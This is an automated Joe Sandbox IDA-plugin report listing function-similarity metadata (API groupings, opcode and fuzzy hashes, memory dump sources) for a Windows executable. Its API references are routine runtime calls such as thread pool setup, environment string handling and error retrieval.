                                                                                  • API ID: _set_statfp
                                                                                  • String ID:
                                                                                  • API String ID: 1156100317-0
                                                                                  • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                  • Instruction ID: a195dddc94355294e31e07f5bf3ce916815294e496d9eba3bb3ddbdbd92aecd0
                                                                                  • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                  • Instruction Fuzzy Hash: DF110436F0C607C1F71431A8F242B79A0416F753A0FCC4ABCEA7D065D6CE6CA8524120
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                  • String ID:
                                                                                  • API String ID: 3621893840-0
                                                                                  • Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                  • Instruction ID: 3e287e7ad9981fdd8843fefa4f582f21f7a8e782f07273730e19e6e598ff200f
                                                                                  • Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                  • Instruction Fuzzy Hash: 96F06221B3854682F710A764E464F3AA211FFE4B05FC81070E54F41994DF2CD149D760
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: __except_validate_context_recordabort
                                                                                  • String ID: csm$csm
                                                                                  • API String ID: 746414643-3733052814
                                                                                  • Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                  • Instruction ID: 978e8e2799074bdecb4edb695a34ce0a9e8fb83b1bd29c7308994083f49684e4
                                                                                  • Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                  • Instruction Fuzzy Hash: 9071D3B29186C186E7A0AFA5D150B7DFBA0EF85B88F488175DACC07A85DF3CD492C750
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID: $*
                                                                                  • API String ID: 3215553584-3982473090
                                                                                  • Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                  • Instruction ID: 356ffdea44a8fba0385a0c292177eda86f37badb23562f1e79c490023433983e
                                                                                  • Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                  • Instruction Fuzzy Hash: BE51A87280C6428AF7E4AFA8844477CBFA0FF29B08F9C11B5D6D943199CF2CD586C665
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$StringType
                                                                                  • String ID: $%s
                                                                                  • API String ID: 3586891840-3791308623
                                                                                  • Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                  • Instruction ID: 4b2c462f25d89f8f8f5889bd80461a9bfd1379ed2912c38dc6028002ad29ea75
                                                                                  • Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                  • Instruction Fuzzy Hash: 36417122B15B914AFB519FA5D800AB9A3D1FF64BA8F8C0675DA5D0B7C4DF3CE4468310
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                  • String ID: csm
                                                                                  • API String ID: 2466640111-1018135373
                                                                                  • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                  • Instruction ID: 13402292314f3f1891e467514b7d62c2b413f2e4b7ec49c73eef9a8d6eebe8c5
                                                                                  • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                  • Instruction Fuzzy Hash: 1C516172A2974287E6A0EB95E040A7EB7A4FB89B91F980174DBCD07B55CF3CD452CB10
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                  • String ID: U
                                                                                  • API String ID: 2456169464-4171548499
                                                                                  • Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                  • Instruction ID: 27ae5dd6f5b8996a04c1396c9e7ce9195c5cc5ff93bd5ad6e465ad1652cbb981
                                                                                  • Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                  • Instruction Fuzzy Hash: 4841D422B18A8282E710DFA5E4047B9B7A4FB98794F884035EF4E87748DF7CD442C710
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectRelease
                                                                                  • String ID:
                                                                                  • API String ID: 1429681911-3916222277
                                                                                  • Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                  • Instruction ID: 8631513b1cc49a17a194af752af0fe2da932460f48d823c17718e456105f6071
                                                                                  • Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                  • Instruction Fuzzy Hash: 3C315E3560874286EB08EF12B819B2AB7A0FB89FD1F844475ED4A43B54DE3DE449CB50
                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(?,?,?,00007FF75AAC317F,?,?,00001000,00007FF75AAAE51D), ref: 00007FF75AABE8BB
                                                                                  • CreateSemaphoreW.KERNEL32(?,?,?,00007FF75AAC317F,?,?,00001000,00007FF75AAAE51D), ref: 00007FF75AABE8CB
                                                                                  • CreateEventW.KERNEL32(?,?,?,00007FF75AAC317F,?,?,00001000,00007FF75AAAE51D), ref: 00007FF75AABE8E4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                  • String ID: Thread pool initialization failed.
                                                                                  • API String ID: 3340455307-2182114853
                                                                                  • Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                  • Instruction ID: 15574e84e03b4e835ba68355d21c7b6c22ed4c57f67a8485b7c6f1f60725ee98
                                                                                  • Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                  • Instruction Fuzzy Hash: 5A21D532E1574186F710AFA4D454BB9B6A2FF98B08F5C8074CA0D0A295DF7E9846C7A0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDeviceRelease
                                                                                  • String ID:
                                                                                  • API String ID: 127614599-3916222277
                                                                                  • Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                  • Instruction ID: 40de916c3b1c36c5abefb31b6504c64b9e9691b7757af3c31764319d10e03ab9
                                                                                  • Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                  • Instruction Fuzzy Hash: 01E0C220B0864186FB0C6BB6B58A83AA261BF4CBD0F598075EA1F43794DE3DC4C44310
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                                                  • String ID:
                                                                                  • API String ID: 1137671866-0
                                                                                  • Opcode ID: cec97bbf542a68d3f637d63df83d07036a1dd9e73fac06600a2283ba6a0594d3
                                                                                  • Instruction ID: 133a9451ddbe0aba4f0de3d98d1d31e0b52f4d28d334403d8b7d1bfbdaa2a4d5
                                                                                  • Opcode Fuzzy Hash: cec97bbf542a68d3f637d63df83d07036a1dd9e73fac06600a2283ba6a0594d3
                                                                                  • Instruction Fuzzy Hash: D0A1E862A1878281FA10EBA4D4406FDA3B1FF85784FC45172EA9D03AD9DF3CE546C760
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1452528299-0
                                                                                  • Opcode ID: 3578434af854304fb897eec4f9fa00df497f7e1084ee6400d5c28e9fbb9a79f6
                                                                                  • Instruction ID: 46cd8229eb9ca151c08ddc619e48e50dab5a4ea7ce4c8fccb02ceb6be9b6997d
                                                                                  • Opcode Fuzzy Hash: 3578434af854304fb897eec4f9fa00df497f7e1084ee6400d5c28e9fbb9a79f6
                                                                                  • Instruction Fuzzy Hash: FA510472B14B4699FB00ABA4D4446FCA361EF84BC8F884176EA5C177D5EE2CD546C360
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1077098981-0
                                                                                  • Opcode ID: ccc7d28b294f4e6884a1db5a4544c49550100c2123dc1ad4bd8ddaa1afcd3233
                                                                                  • Instruction ID: 348e33931302a53a264e1e5ff9adbb1328e9687848327e15194184d58aaff540
                                                                                  • Opcode Fuzzy Hash: ccc7d28b294f4e6884a1db5a4544c49550100c2123dc1ad4bd8ddaa1afcd3233
                                                                                  • Instruction Fuzzy Hash: B251A032A18B4286F7409F61E854BAEB764FF88B84F980075EA4E57B58DF3CD405CB50
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 4141327611-0
                                                                                  • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                  • Instruction ID: ab049e6aa240ac226a2c3fae13684ad696c40c859c66834d041e2c484f9bdf2c
                                                                                  • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                  • Instruction Fuzzy Hash: DC41C8B190E6C246FBA6ABA09040779E6A0EF50B90F9C41B1DACD46AD5DF7CD8438730
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3823481717-0
                                                                                  • Opcode ID: 3bc213a9f55eb78a1b8575f48284007dba253a064d69617307a7282262df2cc1
                                                                                  • Instruction ID: 9568b60ff69ab198568a540652fbfa9fab3b1076288170a69717b661c8e23e31
                                                                                  • Opcode Fuzzy Hash: 3bc213a9f55eb78a1b8575f48284007dba253a064d69617307a7282262df2cc1
                                                                                  • Instruction Fuzzy Hash: AC41F062F10B5184FB00EBF5D8445ACB371BF44BA8B981239DE5D27A99EF39D846C320
                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF75AADC45B), ref: 00007FF75AAE0B91
                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF75AADC45B), ref: 00007FF75AAE0BF3
                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF75AADC45B), ref: 00007FF75AAE0C2D
                                                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF75AADC45B), ref: 00007FF75AAE0C57
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                  • String ID:
                                                                                  • API String ID: 1557788787-0
                                                                                  • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                  • Instruction ID: 4ed8c00cb88fcdd4ef203599b3795b1d57fa044d5fc579d31597f0d1854ca973
                                                                                  • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                  • Instruction Fuzzy Hash: 7F218431B58B5182F664AF516440429F6A4FFA8FD0B8C4178DE9E63B94DF3CE4538314
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$abort
                                                                                  • String ID:
                                                                                  • API String ID: 1447195878-0
                                                                                  • Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                  • Instruction ID: a1594a8624b5cfbe178592ea2d51a148a8f0b966f0d4103741d897e2cda8a99f
                                                                                  • Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                  • Instruction Fuzzy Hash: D5019290B0A68342FAD877F1E555D7CD5615F54790F8C04B8D9AE06BD6ED2CB8078230
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
